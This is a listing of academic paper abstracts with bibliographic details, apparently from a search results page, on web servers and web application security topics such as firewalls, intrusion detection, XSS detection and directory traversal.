Securing Web Application by Embedded Firewall at Gytech Indosantara Mandiri Ltd.

Gytech Indosantara Mandiri Ltd. in the last few years experienced many Cybercrime attacks on the Web Server which caused many moral and material losses. Therefore, it is necessary to consider ways to fight and prevent attacks on the webserver. One way to fight and prevent attacks is to use the Attack Signatures method by using ModSecurity and fail2ban as a Web Application Firewall (WAF). ModSecurity is used to detect and prevent the occurrence of Cyber Crime in the Http and https services. Whereas Fail2ban is used to prevent Bruteforce attacks on ssh, FTP and telnet services. Modesecurity, which acts as a Web Application Firewall (WAF) will send logs to Fail2ban when exploits occur on the Web Server. Meanwhile, Fail2ban will block the Attacker's IP address so that both can be used as a Web Application Firewall or can be used as layer 7 network security.

Download Full-text

APLIKASI PENCARI INFORMASI PERMINTAAN LAYANAN WEB YANG ERROR MENGGUNAKAN ALGORITMA BOYER-MOORE

Unes journal of Information System ◽

10.31933/ujis.1.1.001-010.2016 ◽

2016 ◽

Vol 1 (1) ◽

pp. 001

Author(s):

Harry Setya Hadi

Keyword(s):

Data Storage ◽

Computer Network ◽

Web Server ◽

Access Methods ◽

Ip Address ◽

String Searching ◽

Common Process ◽

Web Server Logs ◽

Different Parts ◽

The Web

String searching is a common process in the processes that made the computer because the text is the main form of data storage. Boyer-Moore is the search string from right to left is considered the most efficient methods in practice, and matching string from the specified direction specifically an algorithm that has the best results theoretically. A system that is connected to a computer network that literally pick a web server that is accessed by multiple users in different parts of both good and bad aim. Any activity performed by the user, will be stored in Web server logs. With a log report contained in the web server can help a web server administrator to search the web request error. Web server log is a record of the activities of a web site that contains the data associated with the IP address, time of access, the page is opened, activities, and access methods. The amount of data contained in the resulting log is a log shed useful information.

Download Full-text

Web Application Vulnerability Detection Using Hybrid String Matching Algorithm

International Journal of Engineering & Technology ◽

10.14419/ijet.v7i3.6.14950 ◽

2018 ◽

Vol 7 (3.6) ◽

pp. 106

Author(s):

B J. Santhosh Kumar ◽

Kankanala Pujitha

Keyword(s):

Web Application ◽

False Negative ◽

String Matching ◽

False Negative Rate ◽

Web Server ◽

Web Pages ◽

Matching Algorithm ◽

White List ◽

Client Side ◽

The Web

Application uses URL as contribution for Web Application Vulnerabilities recognition. if the length of URL is too long then it will consume more time to scan the URL (Ain Zubaidah et.al 2014).Existing system can notice the web pages but not overall web application. This application will test for URL of any length using String matching algorithm. To avoid XSS and CSRF and detect attacks that try to sidestep program upheld arrangements by white list and DOM sandboxing techniques (Elias Athanasopoulos et.al.2012). The web application incorporates a rundown of cryptographic hashes of legitimate (trusted) client side contents. In the event that there is a cryptographic hash for the content in the white list. On the off chance that the hash is discovered the content is viewed as trusted or not trusted. This application makes utilization of SHA-1 for making a message process. The web server stores reliable scripts inside div or span HTML components that are attribute as reliable. DOM sandboxing helps in identifying the script or code. Partitioning Program Symbols into Code and Non-code. This helps to identify any hidden code in trusted tag, which bypass web server. Scanning the website for detecting the injection locations and injecting the mischievous XSS assault vectors in such infusion focuses and check for these assaults in the helpless web application( Shashank Gupta et.al 2015).The proposed application improve the false negative rate.

Download Full-text

Web Server Hacking

Constructing an Ethical Hacking Knowledge Base for Threat Awareness and Prevention ◽

10.4018/978-1-5225-7628-0.ch008 ◽

2019 ◽

pp. 209-243

Keyword(s):

Web Application ◽

Web Applications ◽

Web Server ◽

Dos Attacks ◽

Web Servers ◽

Server Software ◽

Session Hijacking ◽

High Level ◽

Cross Site ◽

The Web

Organizational web servers reflect the public image of an organization and serve web pages/information to organizational clients via web browsers using HTTP protocol. Some of the web server software may contain web applications that enable users to perform high-level tasks, such as querying a database and delivering the output through the web server to the client browser as an HTML file. Hackers always try to exploit the different vulnerabilities or flaws existing in web servers and web applications, which can pose a big threat for an organization. This chapter provides the importance of protecting web servers and applications along with the different tools used for analyzing the security of web servers and web applications. The chapter also introduces different web attacks that are carried out by an attacker either to gain illegal access to the web server data or reduce the availability of web services. The web server attacks includes denial of service (DOS) attacks, buffer overflow exploits, website defacement with sql injection (SQLi) attacks, cross site scripting (XSS) attacks, remote file inclusion (RFI) attacks, directory traversal attacks, phishing attacks, brute force attacks, source code disclosure attacks, session hijacking, parameter form tampering, man-in-the-middle (MITM) attacks, HTTP response splitting attacks, cross-site request forgery (XSRF), lightweight directory access protocol (LDAP) attacks, and hidden field manipulation attacks. The chapter explains different web server and web application testing tools and vulnerability scanners including Nikto, BurpSuite, Paros, IBM AppScan, Fortify, Accunetix, and ZAP. Finally, the chapter also discusses countermeasures to be implemented while designing any web application for any organization in order to reduce the risk.

Download Full-text

Analisis Perbandingan Kinerja Snort Dan Suricata Sebagai Intrusion Detection System Dalam Mendeteksi Serangan Syn Flood Pada Web Server Apache

Respati ◽

10.35842/jtir.v15i2.343 ◽

2020 ◽

Vol 15 (2) ◽

pp. 6

Author(s):

Lukman Lukman ◽

Melati Suci

Keyword(s):

Network Security ◽

Intrusion Detection ◽

Intrusion Detection System ◽

Detection System ◽

Denial Of Service ◽

Web Server ◽

Attack Detection ◽

Web Servers ◽

Server Software ◽

The Web

INTISARIKeamanan jaringan pada web server merupakan bagian yang paling penting untuk menjamin integritas dan layanan bagi pengguna. Web server sering kali menjadi target serangan yang mengakibatkan kerusakan data. Salah satunya serangan SYN Flood merupakan jenis serangan Denial of Service (DOS) yang memberikan permintaan SYN secara besar-besaran kepada web server.Untuk memperkuat keamanan jaringan web server penerapan Intrusion Detection System (IDS) digunakan untuk mendeteksi serangan, memantau dan menganalisa serangan pada web server. Software IDS yang sering digunakan yaitu IDS Snort dan IDS Suricata yang memiliki kelebihan dan kekurangannya masing-masing. Tujuan penelitian kali ini untuk membandingkan kedua IDS menggunakan sistem operasi linux dengan pengujian serangan menggunakan SYN Flood yang akan menyerang web server kemudian IDS Snort dan Suricata yang telah terpasang pada web server akan memberikan peringatan jika terjadi serangan. Dalam menentukan hasil perbandingan, digunakan parameter-parameter yang akan menjadi acuan yaitu jumlah serangan yang terdeteksi dan efektivitas deteksi serangan dari kedua IDS tersebut.Kata kunci: Keamanan jaringan, Web Server, IDS, SYN Flood, Snort, Suricata. ABSTRACTNetwork security on the web server is the most important part to guarantee the integrity and service for users. Web servers are often the target of attacks that result in data damage. One of them is the SYN Flood attack which is a type of Denial of Service (DOS) attack that gives a massive SYN request to the web server.To strengthen web server network security, the application of Intrusion Detection System (IDS) is used to detect attacks, monitor and analyze attacks on web servers. IDS software that is often used is IDS Snort and IDS Suricata which have their respective advantages and disadvantages.The purpose of this study is to compare the two IDS using the Linux operating system with testing the attack using SYN Flood which will attack the web server then IDS Snort and Suricata that have been installed on the web server will give a warning if an attack occurs. In determining the results of the comparison, the parameters used will be the reference, namely the number of attacks detected and the effectiveness of attack detection from the two IDS.Keywords: Network Security, Web Server, IDS, SYN Flood, Snort, Suricata.

Download Full-text

Exploiting personal web servers for mobile context-aware applications

The Knowledge Engineering Review ◽

10.1017/s0269888914000022 ◽

2014 ◽

Vol 29 (2) ◽

pp. 134-153 ◽

Cited By ~ 3

Author(s):

Andrés Fortier ◽

Cecilia Challiol ◽

Juan Lautaro Fernández ◽

Santiago Robles ◽

Gustavo Rossi ◽

...

Keyword(s):

User Interfaces ◽

Web Application ◽

Web Server ◽

Application Framework ◽

Web Browsers ◽

Context Aware ◽

Web Based ◽

Model View Controller ◽

Mobile Context ◽

The Web

AbstractThere is an increasing trend in moving desktop applications to web browsers, even when the web server is running on the same desktop machine. In this paper, we go further in this direction and show how to combine a web server, a web application framework (enhanced to support desktop-like Model–View–Controller interaction) and a context-aware architecture to develop web-based mobile context-aware applications. By using this approach we take advantage of the well-established web paradigm to design the graphical user interfaces (GUIs) and the inherent ability of the web to mash up applications with external components (such as Google Maps). On top of that, since the web server runs on the device itself, the application can access local resources (such as disk space or sensing devices, which are indispensable for context-aware systems) avoiding the sandbox model of the web browsers. To illustrate our approach we show how a mobile hypermedia system has been built on top of our platform.

Download Full-text

COMPARATIVE ANALYSIS OF WEB APPLICATION PERFORMANCE IN CASE OF USING REST VERSUS GRAPHQL

Conference Proceedings (part of ITEMA conference collection) ◽

10.31410/itema.2020.17 ◽

2020 ◽

Author(s):

Milena Vesić ◽

◽

Nenad Kojić ◽

Keyword(s):

Comparative Analysis ◽

Web Application ◽

Web Applications ◽

Web Server ◽

Modern Society ◽

Application Programming Interface ◽

Application Development ◽

Internet Connections ◽

Code Complexity ◽

The Web

Web applications are the most common type of application in modern society since they can be accessed by a large number of users at any time from any device. The only condition for their use is an Internet connection. Most applications run using the HTTP protocol and client-server architecture. This architecture is based on the use of API (Application programming interface), most often REST architecture (Representational State Transfer). If there are several different functionalities on the website that fill their content with data from the web server, for most of them a special HTTP request must be generated with one of the existing methods (GET, POST, PUT, DELETE). This way of communication can be a big problem if the connection to the Internet is weak, there are a lot of HTTP requests because you have to wait for each request to be executed and for the web server to return the data. In this paper, one implementation of GraphQL is presented. GraphQL is an open-source data query and manipulation language for APIs. GraphQL enables faster application development and has less server code. The key advantage is the number of HTTP requests because all the desired data of the page is obtained with one request. This paper will show a comparative analysis on the example of a real website in the case of using the REST architecture and GraphQL in the case of different qualities of Internet connections, code complexity and the number of required requests.

Download Full-text

Deep Dive into Directory Traversal and File Inclusion Attacks leads to Privilege Escalation

International Journal of Scientific Research in Science Engineering and Technology ◽

10.32628/ijsrset218384 ◽

2021 ◽

pp. 115-120

Author(s):

Mrunalsinh Chawda ◽

Dr. Priyanka Sharma ◽

Mr. Jatin Patel

Keyword(s):

Web Application ◽

Web Server ◽

Malicious Code ◽

Web Servers ◽

Deep Dive ◽

User Input ◽

Code Injection ◽

Attack Path ◽

Local File ◽

The Web

In Modern Web application directory traversal vulnerability that can potentially allow an attacker to view arbitrary files and some sensitive files. They can exploit identified vulnerabilities or misconfigurations to obtain root privileges. When building the web application, ensure that some arbitrary file is not publicly available via the production server. when an attacker can include. Traversal vulnerabilities this vulnerability exploits the dynamic file include a mechanism that exists in programming frameworks a local file inclusion happens when uncontrolled user input such as form values or headers for example are used to construct a file include paths. By exploiting directory traversal attacks in web servers, they can do anything and with chaining with code injection they can upload a shell into a web server and perform a website defacement attack. Path-traversal attacks take advantage of vulnerable Website parameters by including a URL reference to remotely hosted malicious code, allowing remote code execution and leads to privilege escalation attack.

Download Full-text

Perancangan dan Implementasi Instrusion Detection System di Jaringan Universitas Diponegoro

Jurnal Teknologi dan Sistem Komputer ◽

10.14710/jtsiskom.3.2.2015.171-178 ◽

2015 ◽

Vol 3 (2) ◽

pp. 171

Author(s):

Dyakso Anindito Nugroho ◽

Adian Fatchur Rochim ◽

Eko Didik Widianto

Keyword(s):

Operating System ◽

Network Security ◽

Intrusion Detection ◽

Intrusion Detection System ◽

Web Application ◽

Detection System ◽

Monitoring Network ◽

Final Project ◽

Security Device ◽

The Web

The use of information technology gives the advantage of open access for its users, but a new problem arises that there is a threat from unauthorized users. Intrusion Detection System (IDS) is applied to assist administrator to monitoring network security. IDS displays illegal access information in a raw form which is require more time to read the detected threats. This final project aims to design an IDS with web application which is made for pulling information on IDS sensor database, then processing and representing them in tables and graphs that are easy to understand. The web application also has IpTables firewall module to block attacker's IP address. The hardware used is Cisco IPS 4240, two computers Compaq Presario 4010F as client and gateway, and Cisco Catalyst 2960 switch. The software used is Ubuntu 12.0 LTS Precise operating system, BackTrack 5 R1 operating system, PHP 5.4 programming language, MySQL 5 database, and web-based system configuration tool Webmin. Testing is done using several BackTrack applications with the aim of Cisco IPS 4240 is capable of detecting accordance with the applicable rules. Each events of any attack attempt or threat was obtained from IDS sensor database in XML form. XML file is sent using Security Device Event Exchange (SDEE) protocol. The web application is tested by looking at the output tables and graphs that displays the appropriate results of sensor detection. This study generated an intrusion detection system that is easier to monitor. Network packets copied by the Cisco 2960 switch and then forwarded to the sensor. Intruder detection is done by Cisco IPS 4240 sensor. Log detection processed by the web application into tables and graphs. Intrusion detection systems are intended to improve network security.

Download Full-text

Servlets

Building and Managing Enterprise-Wide Portals ◽

10.4018/978-1-59140-661-7.ch005 ◽

2011 ◽

pp. 82-93

Author(s):

Jana Polgar ◽

Robert Mark Braum ◽

Tony Polgar

Keyword(s):

Programming Language ◽

Web Application ◽

Web Server ◽

Application Development ◽

Server Side ◽

Java Programming ◽

Web Environment ◽

Web Application Development ◽

Server Architecture ◽

The Web

Servlets are server side programs that respond to requests from browsers. They run in the Web environment. Portal technology grew from the servlets, and each portal page ends up as a servlet. Servlet technology is the foundation of Web application development using the Java programming language. Therefore, understanding servlet technology and the Web server architecture is important.

Download Full-text

Deployment of Web Application in LAN based 3 Tier Architecture

International Journal of Scientific Research in Computer Science Engineering and Information Technology ◽

10.32628/cseit195661 ◽

2019 ◽

pp. 341-345

Author(s):

Abid Hussain ◽

Praveen Kumar Sharma

Keyword(s):

Web Application ◽

Local Area Network ◽

Web Server ◽

Local Area ◽

Vital Role ◽

Area Network ◽

Application Architecture ◽

Application Deployment ◽

Tools And Techniques ◽

The Web

In the Client-Server architecture, any of web and desktop application that can be deployed with the help of 3-tier application architecture. It is consist of a presentation layer, an application layer and a data layer. All there layers does play vital role in the 3-tier architecture for performing variety of operations including business logic, storage of data and handling request. In this paper, we presented deployment process of any web application in the local area network where database and application is located on the remote or web server. Other clients only access the application via specific IP address and valid credentials. The entire request transmitted through the client application and send to the web server. Web server does provide resulted data to the requested client via the web application. We identified several loopholes from the 3-tier architecture adoption perspective and we highlighted the web application deployment interoperability issue that deserves substantial further research and development. In this paper, we investigate several tools and techniques including web server, database server and front-end tools for the successful deployment of the web application in the LAN based 3-tier architecture.

Download Full-text